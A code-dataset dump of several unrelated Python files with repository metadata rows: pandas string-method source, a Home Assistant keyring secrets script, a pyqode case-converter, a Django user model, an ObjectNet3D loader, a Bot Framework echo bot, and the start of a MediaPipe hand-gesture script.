"side": "highest",
"similar": "rfind",
"method": "rindex",
"also": "index : Return lowest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def rindex(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_rindex(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
def len(self):
result = self._data.array._str_len()
return self._wrap_result(result, returns_string=False)
_shared_docs[
"casemethods"
] = """
Convert strings in the Series/Index to %(type)s.
%(version)s
Equivalent to :meth:`str.%(method)s`.
Returns
-------
Series or Index of object
See Also
--------
Series.str.lower : Converts all characters to lowercase.
Series.str.upper : Converts all characters to uppercase.
Series.str.title : Converts first character of each word to uppercase and
remaining to lowercase.
Series.str.capitalize : Converts first character to uppercase and
remaining to lowercase.
Series.str.swapcase : Converts uppercase to lowercase and lowercase to
uppercase.
Series.str.casefold: Removes all case distinctions in the string.
Examples
--------
>>> s = pd.Series(['lower', 'CAPITALS', 'this is a sentence', 'SwApCaSe'])
>>> s
0 lower
1 CAPITALS
2 this is a sentence
3 SwApCaSe
dtype: object
>>> s.str.lower()
0 lower
1 capitals
2 this is a sentence
3 swapcase
dtype: object
>>> s.str.upper()
0 LOWER
1 CAPITALS
2 THIS IS A SENTENCE
3 SWAPCASE
dtype: object
>>> s.str.title()
0 Lower
1 Capitals
2 This Is A Sentence
3 Swapcase
dtype: object
>>> s.str.capitalize()
0 Lower
1 Capitals
2 This is a sentence
3 Swapcase
dtype: object
>>> s.str.swapcase()
0 LOWER
1 capitals
2 THIS IS A SENTENCE
3 sWaPcAsE
dtype: object
"""
_doc_args: Dict[str, Dict[str, str]] = {}
_doc_args["lower"] = {"type": "lowercase", "method": "lower", "version": ""}
_doc_args["upper"] = {"type": "uppercase", "method": "upper", "version": ""}
_doc_args["title"] = {"type": "titlecase", "method": "title", "version": ""}
_doc_args["capitalize"] = {
"type": "be capitalized",
"method": "capitalize",
"version": "",
}
_doc_args["swapcase"] = {
"type": "be swapcased",
"method": "swapcase",
"version": "",
}
_doc_args["casefold"] = {
"type": "be casefolded",
"method": "casefold",
"version": "\n .. versionadded:: 0.25.0\n",
}
@Appender(_shared_docs["casemethods"] % _doc_args["lower"])
@forbid_nonstring_types(["bytes"])
def lower(self):
result = self._data.array._str_lower()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["upper"])
@forbid_nonstring_types(["bytes"])
def upper(self):
result = self._data.array._str_upper()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["title"])
@forbid_nonstring_types(["bytes"])
def title(self):
result = self._data.array._str_title()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["capitalize"])
@forbid_nonstring_types(["bytes"])
def capitalize(self):
result = self._data.array._str_capitalize()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["swapcase"])
@forbid_nonstring_types(["bytes"])
def swapcase(self):
result = self._data.array._str_swapcase()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["casefold"])
@forbid_nonstring_types(["bytes"])
def casefold(self):
result = self._data.array._str_casefold()
return self._wrap_result(result)
_shared_docs[
"ismethods"
] = """
Check whether all characters in each string are %(type)s.
This is equivalent to running the Python string method
:meth:`str.%(method)s` for each element of the Series/Index. If a string
has zero characters, ``False`` is returned for that check.
Returns
-------
Series or Index of bool
Series or Index of boolean values with the same length as the original
Series/Index.
See Also
--------
Series.str.isalpha : Check whether all characters are alphabetic.
Series.str.isnumeric : Check whether all characters are numeric.
Series.str.isalnum : Check whether all characters are alphanumeric.
Series.str.isdigit : Check whether all characters are digits.
Series.str.isdecimal : Check whether all characters are decimal.
Series.str.isspace : Check whether all characters are whitespace.
Series.str.islower : Check whether all characters are lowercase.
Series.str.isupper : Check whether all characters are uppercase.
Series.str.istitle : Check whether all characters are titlecase.
Examples
--------
**Checks for Alphabetic and Numeric Characters**
>>> s1 = pd.Series(['one', 'one1', '1', ''])
>>> s1.str.isalpha()
0 True
1 False
2 False
3 False
dtype: bool
>>> s1.str.isnumeric()
0 False
1 False
2 True
3 False
dtype: bool
>>> s1.str.isalnum()
0 True
1 True
2 True
3 False
dtype: bool
Note that checks against characters mixed with any additional punctuation
or whitespace will evaluate to false for an alphanumeric check.
>>> s2 = pd.Series(['A B', '1.5', '3,000'])
>>> s2.str.isalnum()
0 False
1 False
2 False
dtype: bool
**More Detailed Checks for Numeric Characters**
There are several different but overlapping sets of numeric characters that
can be checked for.
>>> s3 = pd.Series(['23', '³', '⅕', ''])
The ``s3.str.isdecimal`` method checks for characters used to form numbers
in base 10.
>>> s3.str.isdecimal()
0 True
1 False
2 False
3 False
dtype: bool
The ``s.str.isdigit`` method is the same as ``s3.str.isdecimal`` but also
includes special digits, like superscripted and subscripted digits in
unicode.
>>> s3.str.isdigit()
0 True
1 True
2 False
3 False
dtype: bool
The ``s.str.isnumeric`` method is the same as ``s3.str.isdigit`` but also
includes other characters that can represent quantities such as unicode
fractions.
>>> s3.str.isnumeric()
0 True
1 True
2 True
3 False
dtype: bool
**Checks for Whitespace**
>>> s4 = pd.Series([' ', '\\t\\r\\n ', ''])
>>> s4.str.isspace()
0 True
1 True
2 False
dtype: bool
**Checks for Character Case**
>>> s5 = pd.Series(['leopard', 'Golden Eagle', 'SNAKE', ''])
>>> s5.str.islower()
0 True
1 False
2 False
3 False
dtype: bool
>>> s5.str.isupper()
0 False
1 False
2 True
3 False
dtype: bool
The ``s5.str.istitle`` method checks for whether all words are in title
case (whether only the first letter of each word is capitalized). Words are
assumed to be as any sequence of non-numeric characters separated by
whitespace characters.
>>> s5.str.istitle()
0 False
1 True
2 False
3 False
dtype: bool
"""
_doc_args["isalnum"] = {"type": "alphanumeric", "method": "isalnum"}
_doc_args["isalpha"] = {"type": "alphabetic", "method": "isalpha"}
_doc_args["isdigit"] = {"type": "digits", "method": "isdigit"}
_doc_args["isspace"] = {"type": "whitespace", "method": "isspace"}
_doc_args["islower"] = {"type": "lowercase", "method": "islower"}
_doc_args["isupper"] = {"type": "uppercase", "method": "isupper"}
_doc_args["istitle"] = {"type": "titlecase", "method": "istitle"}
_doc_args["isnumeric"] = {"type": "numeric", "method": "isnumeric"}
_doc_args["isdecimal"] = {"type": "decimal", "method": "isdecimal"}
isalnum = _map_and_wrap(
"isalnum", docstring=_shared_docs["ismethods"] % _doc_args["isalnum"]
)
isalpha = _map_and_wrap(
"isalpha", docstring=_shared_docs["ismethods"] % _doc_args["isalpha"]
)
isdigit = _map_and_wrap(
"isdigit", docstring=_shared_docs["ismethods"] % _doc_args["isdigit"]
)
isspace = _map_and_wrap(
"isspace", docstring=_shared_docs["ismethods"] % _doc_args["isalnum"]
)
islower = _map_and_wrap(
"islower", docstring=_shared_docs["ismethods"] % _doc_args["islower"]
)
isupper = _map_and_wrap(
"isupper", docstring=_shared_docs["ismethods"] % _doc_args["isupper"]
)
istitle = _map_and_wrap(
"istitle", docstring=_shared_docs["ismethods"] % _doc_args["istitle"]
)
isnumeric = _map_and_wrap(
"isnumeric", docstring=_shared_docs["ismethods"] % _doc_args["isnumeric"]
)
isdecimal = _map_and_wrap(
"isdecimal", docstring=_shared_docs["ismethods"] % _doc_args["isdecimal"]
)
def cat_safe(list_of_columns: List, sep: str):
try:
result = cat_core(list_of_columns, sep)
except TypeError:
for column in list_of_columns:
dtype = lib.infer_dtype(column, skipna=True)
if dtype not in ["string", "empty"]:
raise TypeError(
"Concatenation requires list-likes containing only "
"strings (or missing values). Offending values found in "
f"column {dtype}"
) from None
return result
def cat_core(list_of_columns: List, sep: str):
if sep == "":
arr_of_cols = np.asarray(list_of_columns, dtype=object)
return np.sum(arr_of_cols, axis=0)
list_with_sep = [sep] * (2 * len(list_of_columns) - 1)
list_with_sep[::2] = list_of_columns
arr_with_sep = np.asarray(list_with_sep, dtype=object)
return np.sum(arr_with_sep, axis=0)
def _groups_or_na_fun(regex):
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
empty_row = [np.nan] * regex.groups
def f(x):
if not isinstance(x, str):
return empty_row
m = regex.search(x)
if m:
return [np.nan if item is None else item for item in m.groups()]
else:
return empty_row
return f
def _result_dtype(arr):
from pandas.core.arrays.string_ import StringDtype
from pandas.core.arrays.string_arrow import ArrowStringDtype
if isinstance(arr.dtype, (StringDtype, ArrowStringDtype)):
return arr.dtype.name
else:
return object
def _get_single_group_name(rx):
try:
return list(rx.groupindex.keys()).pop()
except IndexError:
return None
def _str_extract_noexpand(arr, pat, flags=0):
from pandas import (
DataFrame,
array as pd_array,
)
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
result_dtype = _result_dtype(arr)
if regex.groups == 1:
result = np.array([groups_or_na(val)[0] for val in arr], dtype=object)
name = _get_single_group_name(regex)
result = pd_array(result, dtype=result_dtype)
else:
if isinstance(arr, ABCIndex):
raise ValueError("only one regex group is supported with Index")
name = None
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if arr.size == 0:
result = DataFrame(
columns=columns, dtype=object
)
else:
dtype = _result_dtype(arr)
result = DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=arr.index,
dtype=dtype,
)
return result, name
def _str_extract_frame(arr, pat, flags=0):
from pandas import DataFrame
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if len(arr) == 0:
return DataFrame(columns=columns, dtype=object)
try:
result_index = arr.index
except AttributeError:
result_index = None
dtype = _result_dtype(arr)
return DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=result_index,
dtype=dtype,
)
def str_extract(arr, pat, flags=0, expand=True):
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand:
result = _str_extract_frame(arr._orig, pat, flags=flags)
return result.__finalize__(arr._orig, method="str_extract")
else:
result, name = _str_extract_noexpand(arr._orig, pat, flags=flags)
return arr._wrap_result(result, name=name, expand=expand)
def str_extractall(arr, pat, flags=0):
regex = re.compile(pat, flags=flags)
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
if isinstance(arr, ABCIndex):
arr = arr.to_series().reset_index(drop=True)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
match_list = []
index_list = []
is_mi = arr.index.nlevels > 1
for subject_key, subject in arr.items():
if isinstance(subject, str):
if not is_mi:
subject_key = (subject_key,)
for match_i, match_tuple in enumerate(regex.findall(subject)):
if isinstance(match_tuple, str):
match_tuple = (match_tuple,)
na_tuple = [np.NaN if group == "" else group for group in match_tuple]
match_list.append(na_tuple)
result_key = tuple(subject_key + (match_i,))
index_list.append(result_key)
from pandas import MultiIndex
index = MultiIndex.from_tuples(index_list, names=arr.index.names + ["match"])
dtype = _result_dtype(arr)
result = arr._constructor_expanddim(
match_list, index=index, columns=columns, dtype=dtype
)
return result
| true | true |
f7fa33aca37f41ebbd190f0d067a5693db3e8827 | 2,187 | py | Python | homeassistant/scripts/keyring.py | kdschlosser/home-assistant | a94a24f6f83508642e220fadf2799789dc32a25b | [
"Apache-2.0"
] | 4 | 2019-07-03T22:36:57.000Z | 2019-08-10T15:33:25.000Z | homeassistant/scripts/keyring.py | kdschlosser/home-assistant | a94a24f6f83508642e220fadf2799789dc32a25b | [
"Apache-2.0"
] | 7 | 2019-08-23T05:26:02.000Z | 2022-03-11T23:57:18.000Z | homeassistant/scripts/keyring.py | kdschlosser/home-assistant | a94a24f6f83508642e220fadf2799789dc32a25b | [
"Apache-2.0"
] | 3 | 2019-04-28T16:35:45.000Z | 2020-05-28T15:21:59.000Z | """Script to get, set and delete secrets stored in the keyring."""
import argparse
import getpass
import os
from homeassistant.util.yaml import _SECRET_NAMESPACE
REQUIREMENTS = ['keyring==17.1.1', 'keyrings.alt==3.1.1']
def run(args):
"""Handle keyring script."""
parser = argparse.ArgumentParser(
description=("Modify Home Assistant secrets in the default keyring. "
"Use the secrets in configuration files with: "
"!secret <name>"))
parser.add_argument(
'--script', choices=['keyring'])
parser.add_argument(
'action', choices=['get', 'set', 'del', 'info'],
help="Get, set or delete a secret")
parser.add_argument(
'name', help="Name of the secret", nargs='?', default=None)
import keyring
from keyring.util import platform_ as platform
args = parser.parse_args(args)
if args.action == 'info':
keyr = keyring.get_keyring()
print('Keyring version {}\n'.format(REQUIREMENTS[0].split('==')[1]))
print('Active keyring : {}'.format(keyr.__module__))
config_name = os.path.join(platform.config_root(), 'keyringrc.cfg')
print('Config location : {}'.format(config_name))
print('Data location : {}\n'.format(platform.data_root()))
elif args.name is None:
parser.print_help()
return 1
if args.action == 'set':
the_secret = getpass.getpass(
'Please enter the secret for {}: '.format(args.name))
keyring.set_password(_SECRET_NAMESPACE, args.name, the_secret)
print('Secret {} set successfully'.format(args.name))
elif args.action == 'get':
the_secret = keyring.get_password(_SECRET_NAMESPACE, args.name)
if the_secret is None:
print('Secret {} not found'.format(args.name))
else:
print('Secret {}={}'.format(args.name, the_secret))
elif args.action == 'del':
try:
keyring.delete_password(_SECRET_NAMESPACE, args.name)
print('Deleted secret {}'.format(args.name))
except keyring.errors.PasswordDeleteError:
print('Secret {} not found'.format(args.name))
| 37.706897 | 77 | 0.622314 | import argparse
import getpass
import os
from homeassistant.util.yaml import _SECRET_NAMESPACE
REQUIREMENTS = ['keyring==17.1.1', 'keyrings.alt==3.1.1']
def run(args):
parser = argparse.ArgumentParser(
description=("Modify Home Assistant secrets in the default keyring. "
"Use the secrets in configuration files with: "
"!secret <name>"))
parser.add_argument(
'--script', choices=['keyring'])
parser.add_argument(
'action', choices=['get', 'set', 'del', 'info'],
help="Get, set or delete a secret")
parser.add_argument(
'name', help="Name of the secret", nargs='?', default=None)
import keyring
from keyring.util import platform_ as platform
args = parser.parse_args(args)
if args.action == 'info':
keyr = keyring.get_keyring()
print('Keyring version {}\n'.format(REQUIREMENTS[0].split('==')[1]))
print('Active keyring : {}'.format(keyr.__module__))
config_name = os.path.join(platform.config_root(), 'keyringrc.cfg')
print('Config location : {}'.format(config_name))
print('Data location : {}\n'.format(platform.data_root()))
elif args.name is None:
parser.print_help()
return 1
if args.action == 'set':
the_secret = getpass.getpass(
'Please enter the secret for {}: '.format(args.name))
keyring.set_password(_SECRET_NAMESPACE, args.name, the_secret)
print('Secret {} set successfully'.format(args.name))
elif args.action == 'get':
the_secret = keyring.get_password(_SECRET_NAMESPACE, args.name)
if the_secret is None:
print('Secret {} not found'.format(args.name))
else:
print('Secret {}={}'.format(args.name, the_secret))
elif args.action == 'del':
try:
keyring.delete_password(_SECRET_NAMESPACE, args.name)
print('Deleted secret {}'.format(args.name))
except keyring.errors.PasswordDeleteError:
print('Secret {} not found'.format(args.name))
| true | true |
f7fa33ce28fe81e083634e756ec089b7da29625f | 2,002 | py | Python | pyqode/core/modes/case_converter.py | SunChuquin/pyqode.core | edf29204446e3679701e74343288cf692eb07d86 | [
"MIT"
] | 42 | 2018-05-02T07:07:27.000Z | 2022-02-01T19:49:49.000Z | pyqode/core/modes/case_converter.py | SunChuquin/pyqode.core | edf29204446e3679701e74343288cf692eb07d86 | [
"MIT"
] | 65 | 2018-03-08T11:53:13.000Z | 2018-09-17T09:00:09.000Z | Lib/site-packages/pyqode/core/modes/case_converter.py | fochoao/cpython | 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9 | [
"bzip2-1.0.6",
"0BSD"
] | 24 | 2015-01-09T14:16:41.000Z | 2021-12-06T15:11:22.000Z | # -*- coding: utf-8 -*-
"""
Contains a case converter mode.
"""
from pyqode.core.api import TextHelper
from pyqode.core.api.mode import Mode
from pyqode.qt import QtCore, QtWidgets
class CaseConverterMode(Mode):
""" Provides context actions for converting case of the selected text.
Converts selected text to lower case or UPPER case.
It does so by adding two new menu entries to the editor's context menu:
- *Convert to lower case*: ctrl-u
- *Convert to UPPER CASE*: ctrl+shift+u
"""
def __init__(self):
Mode.__init__(self)
self._actions_created = False
self.action_to_lower = None
self.action_to_upper = None
def to_upper(self):
"""
Converts selected text to upper
"""
TextHelper(self.editor).selected_text_to_upper()
def to_lower(self):
"""
Converts selected text to lower
"""
TextHelper(self.editor).selected_text_to_lower()
def _create_actions(self):
""" Create associated actions """
self.action_to_lower = QtWidgets.QAction(self.editor)
self.action_to_lower.triggered.connect(self.to_lower)
self.action_to_upper = QtWidgets.QAction(self.editor)
self.action_to_upper.triggered.connect(self.to_upper)
self.action_to_lower.setText(_('Convert to lower case'))
self.action_to_lower.setShortcut('Ctrl+U')
self.action_to_upper.setText(_('Convert to UPPER CASE'))
self.action_to_upper.setShortcut('Ctrl+Shift+U')
self.menu = QtWidgets.QMenu(_('Case'), self.editor)
self.menu.addAction(self.action_to_lower)
self.menu.addAction(self.action_to_upper)
self._actions_created = True
def on_state_changed(self, state):
if state:
if not self._actions_created:
self._create_actions()
self.editor.add_action(self.menu.menuAction())
else:
self.editor.remove_action(self.menu.menuAction())
| 33.932203 | 75 | 0.660839 |
from pyqode.core.api import TextHelper
from pyqode.core.api.mode import Mode
from pyqode.qt import QtCore, QtWidgets
class CaseConverterMode(Mode):
def __init__(self):
Mode.__init__(self)
self._actions_created = False
self.action_to_lower = None
self.action_to_upper = None
def to_upper(self):
TextHelper(self.editor).selected_text_to_upper()
def to_lower(self):
TextHelper(self.editor).selected_text_to_lower()
def _create_actions(self):
self.action_to_lower = QtWidgets.QAction(self.editor)
self.action_to_lower.triggered.connect(self.to_lower)
self.action_to_upper = QtWidgets.QAction(self.editor)
self.action_to_upper.triggered.connect(self.to_upper)
self.action_to_lower.setText(_('Convert to lower case'))
self.action_to_lower.setShortcut('Ctrl+U')
self.action_to_upper.setText(_('Convert to UPPER CASE'))
self.action_to_upper.setShortcut('Ctrl+Shift+U')
self.menu = QtWidgets.QMenu(_('Case'), self.editor)
self.menu.addAction(self.action_to_lower)
self.menu.addAction(self.action_to_upper)
self._actions_created = True
def on_state_changed(self, state):
if state:
if not self._actions_created:
self._create_actions()
self.editor.add_action(self.menu.menuAction())
else:
self.editor.remove_action(self.menu.menuAction())
| true | true |
f7fa33e3558687cee8af5b79e668aebfec435e6d | 453 | py | Python | users/models.py | sandeepagrawal8875/DjangoMultipleUser | 81cfc4f679b29df777a0a36db524c9defac01a0b | [
"MIT"
] | null | null | null | users/models.py | sandeepagrawal8875/DjangoMultipleUser | 81cfc4f679b29df777a0a36db524c9defac01a0b | [
"MIT"
] | null | null | null | users/models.py | sandeepagrawal8875/DjangoMultipleUser | 81cfc4f679b29df777a0a36db524c9defac01a0b | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
is_student = models.BooleanField(default=False)
is_teacher = models.BooleanField(default=False)
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField(upload_to='profile', null=True, blank=True)
def __str__(self):
return self.user.username | 30.2 | 74 | 0.732892 | from django.db import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
is_student = models.BooleanField(default=False)
is_teacher = models.BooleanField(default=False)
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField(upload_to='profile', null=True, blank=True)
def __str__(self):
return self.user.username | true | true |
f7fa35208d27a1fd3736b882390bd2b44ca52789 | 2,321 | py | Python | pytorch_datasets/datasets/object_net_3d.py | mpeven/Pytorch_Datasets | 6a1709bfb59739b5e7ce299c70350b0080209c82 | [
"Apache-2.0"
] | 3 | 2019-01-22T19:19:49.000Z | 2020-12-16T01:29:56.000Z | pytorch_datasets/datasets/object_net_3d.py | mpeven/Pytorch_Datasets | 6a1709bfb59739b5e7ce299c70350b0080209c82 | [
"Apache-2.0"
] | null | null | null | pytorch_datasets/datasets/object_net_3d.py | mpeven/Pytorch_Datasets | 6a1709bfb59739b5e7ce299c70350b0080209c82 | [
"Apache-2.0"
] | 2 | 2019-01-22T19:20:01.000Z | 2020-12-06T05:50:14.000Z | import os
import glob
from tqdm import tqdm
from PIL import Image
import scipy.io as sio
import h5py
import torch
import pytorch_datasets.utils.cache_manager as cache
class ObjectNet3D(torch.utils.data.Dataset):
dset_location = '/hdd/Datasets/ObjectNet3D/'
dset_cached_location = dset_location + "cached_dataset.pkl"
def __init__(self):
self.dataset = self.create_dataset()
def create_dataset(self):
cached_dset = cache.retreive_from_cache(self.dset_cached_location)
if cached_dset is not False:
return cached_dset
dataset = []
for matfile in tqdm(glob.glob(self.dset_location + "Annotations/*")):
try:
x = sio.loadmat(matfile)
except Exception:
continue
for obj in x['record']['objects'][0, 0][0]:
# Get elevation (or fine-grained elevation if it exists)
elevation = obj['viewpoint']['elevation_coarse'][0][0][0][0]
if 'elevation' in obj['viewpoint'].dtype.names:
if len(obj['viewpoint']['elevation'][0][0]) > 0:
elevation = obj['viewpoint']['elevation'][0][0][0][0]
# Get azimuth (or fine-grained azimuth if it exists)
azimuth = obj['viewpoint']['azimuth_coarse'][0][0][0][0]
if 'azimuth' in obj['viewpoint'].dtype.names:
if len(obj['viewpoint']['azimuth'][0][0]) > 0:
azimuth = obj['viewpoint']['azimuth'][0][0][0][0]
dataset.append({
'image_file': self.dset_location + "Images/" + x['record']['filename'][0, 0][0],
'object_type': obj['class'][0],
'azimuth': azimuth,
'elevation': elevation,
'distance': obj['viewpoint']['distance'][0][0][0][0],
'theta': obj['viewpoint']['theta'][0][0][0][0],
'bbox': obj['bbox'][0],
})
cache.cache(dataset, self.dset_cached_location)
return dataset
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
datum = self.dataset[idx]
datum['image'] = Image.open(datum['image_file']).convert('RGB')
return datum
| 36.84127 | 100 | 0.54847 | import os
import glob
from tqdm import tqdm
from PIL import Image
import scipy.io as sio
import h5py
import torch
import pytorch_datasets.utils.cache_manager as cache
class ObjectNet3D(torch.utils.data.Dataset):
dset_location = '/hdd/Datasets/ObjectNet3D/'
dset_cached_location = dset_location + "cached_dataset.pkl"
def __init__(self):
self.dataset = self.create_dataset()
def create_dataset(self):
cached_dset = cache.retreive_from_cache(self.dset_cached_location)
if cached_dset is not False:
return cached_dset
dataset = []
for matfile in tqdm(glob.glob(self.dset_location + "Annotations/*")):
try:
x = sio.loadmat(matfile)
except Exception:
continue
for obj in x['record']['objects'][0, 0][0]:
elevation = obj['viewpoint']['elevation_coarse'][0][0][0][0]
if 'elevation' in obj['viewpoint'].dtype.names:
if len(obj['viewpoint']['elevation'][0][0]) > 0:
elevation = obj['viewpoint']['elevation'][0][0][0][0]
azimuth = obj['viewpoint']['azimuth_coarse'][0][0][0][0]
if 'azimuth' in obj['viewpoint'].dtype.names:
if len(obj['viewpoint']['azimuth'][0][0]) > 0:
azimuth = obj['viewpoint']['azimuth'][0][0][0][0]
dataset.append({
'image_file': self.dset_location + "Images/" + x['record']['filename'][0, 0][0],
'object_type': obj['class'][0],
'azimuth': azimuth,
'elevation': elevation,
'distance': obj['viewpoint']['distance'][0][0][0][0],
'theta': obj['viewpoint']['theta'][0][0][0][0],
'bbox': obj['bbox'][0],
})
cache.cache(dataset, self.dset_cached_location)
return dataset
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
datum = self.dataset[idx]
datum['image'] = Image.open(datum['image_file']).convert('RGB')
return datum
| true | true |
f7fa3559bb547fc7fdc1efdb984f0199d0a9b821 | 27 | py | Python | 6 - Function/builtin.py | pebueno/Python | d791be1e853f61d80f9eeeb2b1e888835a5bdb63 | [
"MIT"
] | 2 | 2022-02-09T19:56:31.000Z | 2022-02-17T17:47:52.000Z | 6 - Function/builtin.py | pebueno/Python | d791be1e853f61d80f9eeeb2b1e888835a5bdb63 | [
"MIT"
] | null | null | null | 6 - Function/builtin.py | pebueno/Python | d791be1e853f61d80f9eeeb2b1e888835a5bdb63 | [
"MIT"
] | null | null | null | # help(input)
# help(float) | 13.5 | 13 | 0.666667 | true | true | |
f7fa35cacd33049c24690ad9f8efe0d64b2b63f6 | 2,954 | py | Python | generators/app/templates/echo/{{cookiecutter.bot_name}}/app.py | hangdong/botbuilder-python | 8ff979a58fadc4356d76b9ce577f94da3245f664 | [
"MIT"
] | null | null | null | generators/app/templates/echo/{{cookiecutter.bot_name}}/app.py | hangdong/botbuilder-python | 8ff979a58fadc4356d76b9ce577f94da3245f664 | [
"MIT"
] | null | null | null | generators/app/templates/echo/{{cookiecutter.bot_name}}/app.py | hangdong/botbuilder-python | 8ff979a58fadc4356d76b9ce577f94da3245f664 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import asyncio
import sys
from datetime import datetime
from types import MethodType
from flask import Flask, request, Response
from botbuilder.core import (
BotFrameworkAdapter,
BotFrameworkAdapterSettings,
TurnContext,
)
from botbuilder.schema import Activity, ActivityTypes
from bot import MyBot
# Create the loop and Flask app
LOOP = asyncio.get_event_loop()
APP = Flask(__name__, instance_relative_config=True)
APP.config.from_object("config.DefaultConfig")
# Create adapter.
# See https://aka.ms/about-bot-adapter to learn more about how bots work.
SETTINGS = BotFrameworkAdapterSettings(APP.config["APP_ID"], APP.config["APP_PASSWORD"])
ADAPTER = BotFrameworkAdapter(SETTINGS)
# Catch-all for errors.
# pylint: disable=unused-argument
async def on_error(self, context: TurnContext, error: Exception):
# This check writes out errors to console log .vs. app insights.
# NOTE: In production environment, you should consider logging this to Azure
# application insights.
print(f"\n [on_turn_error] unhandled error: {error}", file=sys.stderr)
# Send a message to the user
await context.send_activity("The bot encounted an error or bug.")
await context.send_activity("To continue to run this bot, please fix the bot source code.")
# Send a trace activity if we're talking to the Bot Framework Emulator
if context.activity.channel_id == 'emulator':
# Create a trace activity that contains the error object
trace_activity = Activity(
label="TurnError",
name="on_turn_error Trace",
timestamp=datetime.utcnow(),
type=ActivityTypes.trace,
value=f"{error}",
value_type="https://www.botframework.com/schemas/error"
)
# Send a trace activity, which will be displayed in Bot Framework Emulator
await context.send_activity(trace_activity)
ADAPTER.on_turn_error = MethodType(on_error, ADAPTER)
# Create the main dialog
BOT = MyBot()
# Listen for incoming requests on /api/messages.
@APP.route("/api/messages", methods=["POST"])
def messages():
# Main bot message handler.
if "application/json" in request.headers["Content-Type"]:
body = request.json
else:
return Response(status=415)
activity = Activity().deserialize(body)
auth_header = (
request.headers["Authorization"] if "Authorization" in request.headers else ""
)
try:
task = LOOP.create_task(
ADAPTER.process_activity(activity, auth_header, BOT.on_turn)
)
LOOP.run_until_complete(task)
return Response(status=201)
except Exception as exception:
raise exception
if __name__ == "__main__":
try:
APP.run(debug=False, port=APP.config["PORT"]) # nosec debug
except Exception as exception:
raise exception
| 33.954023 | 95 | 0.703791 |
import asyncio
import sys
from datetime import datetime
from types import MethodType
from flask import Flask, request, Response
from botbuilder.core import (
BotFrameworkAdapter,
BotFrameworkAdapterSettings,
TurnContext,
)
from botbuilder.schema import Activity, ActivityTypes
from bot import MyBot
LOOP = asyncio.get_event_loop()
APP = Flask(__name__, instance_relative_config=True)
APP.config.from_object("config.DefaultConfig")
SETTINGS = BotFrameworkAdapterSettings(APP.config["APP_ID"], APP.config["APP_PASSWORD"])
ADAPTER = BotFrameworkAdapter(SETTINGS)
async def on_error(self, context: TurnContext, error: Exception):
print(f"\n [on_turn_error] unhandled error: {error}", file=sys.stderr)
await context.send_activity("The bot encounted an error or bug.")
await context.send_activity("To continue to run this bot, please fix the bot source code.")
if context.activity.channel_id == 'emulator':
# Create a trace activity that contains the error object
trace_activity = Activity(
label="TurnError",
name="on_turn_error Trace",
timestamp=datetime.utcnow(),
type=ActivityTypes.trace,
value=f"{error}",
value_type="https://www.botframework.com/schemas/error"
)
# Send a trace activity, which will be displayed in Bot Framework Emulator
await context.send_activity(trace_activity)
ADAPTER.on_turn_error = MethodType(on_error, ADAPTER)
# Create the main dialog
BOT = MyBot()
# Listen for incoming requests on /api/messages.
@APP.route("/api/messages", methods=["POST"])
def messages():
# Main bot message handler.
if "application/json" in request.headers["Content-Type"]:
body = request.json
else:
return Response(status=415)
activity = Activity().deserialize(body)
auth_header = (
request.headers["Authorization"] if "Authorization" in request.headers else ""
)
try:
task = LOOP.create_task(
ADAPTER.process_activity(activity, auth_header, BOT.on_turn)
)
LOOP.run_until_complete(task)
return Response(status=201)
except Exception as exception:
raise exception
if __name__ == "__main__":
try:
APP.run(debug=False, port=APP.config["PORT"]) # nosec debug
except Exception as exception:
raise exception
| true | true |
f7fa35d41a177af1e34031c23ace8c8bd817d358 | 3,158 | py | Python | handFiguration/hand_learning.py | CAU-OSP-02/T03 | bd5e32eb76aa651d959c86439f13c07d7781004a | [
"MIT"
] | null | null | null | handFiguration/hand_learning.py | CAU-OSP-02/T03 | bd5e32eb76aa651d959c86439f13c07d7781004a | [
"MIT"
] | null | null | null | handFiguration/hand_learning.py | CAU-OSP-02/T03 | bd5e32eb76aa651d959c86439f13c07d7781004a | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# v.1.1
import cv2
import mediapipe as mp
import numpy as np
gesture = {
0:'fist', 1:'one', 2:'two', 3:'three', 4:'four', 5:'five',
6:'six', 7:'rock', 8:'spiderman', 9:'yeah', 10:'ok'
} #MediaPipe 제공 제스쳐
hand_gesture = {
0:'fist', 1:'one', 2:'gun', 3:'three', 4:'four', 5:'five',
6:'promise', 7:'spiderman', 8:'niconiconi', 9:'two', 10:'ok',
11:'claws', 12:'good', 13:'fanxyChild', 14:'dog'
} #게임에 사용할 NEW 제스처 세트 -> 추가할 것 하고 기존의 것은 알아보기 쉽게 이름을 정리
#MediaPipe hands model
mp_hands = mp.solutions.hands
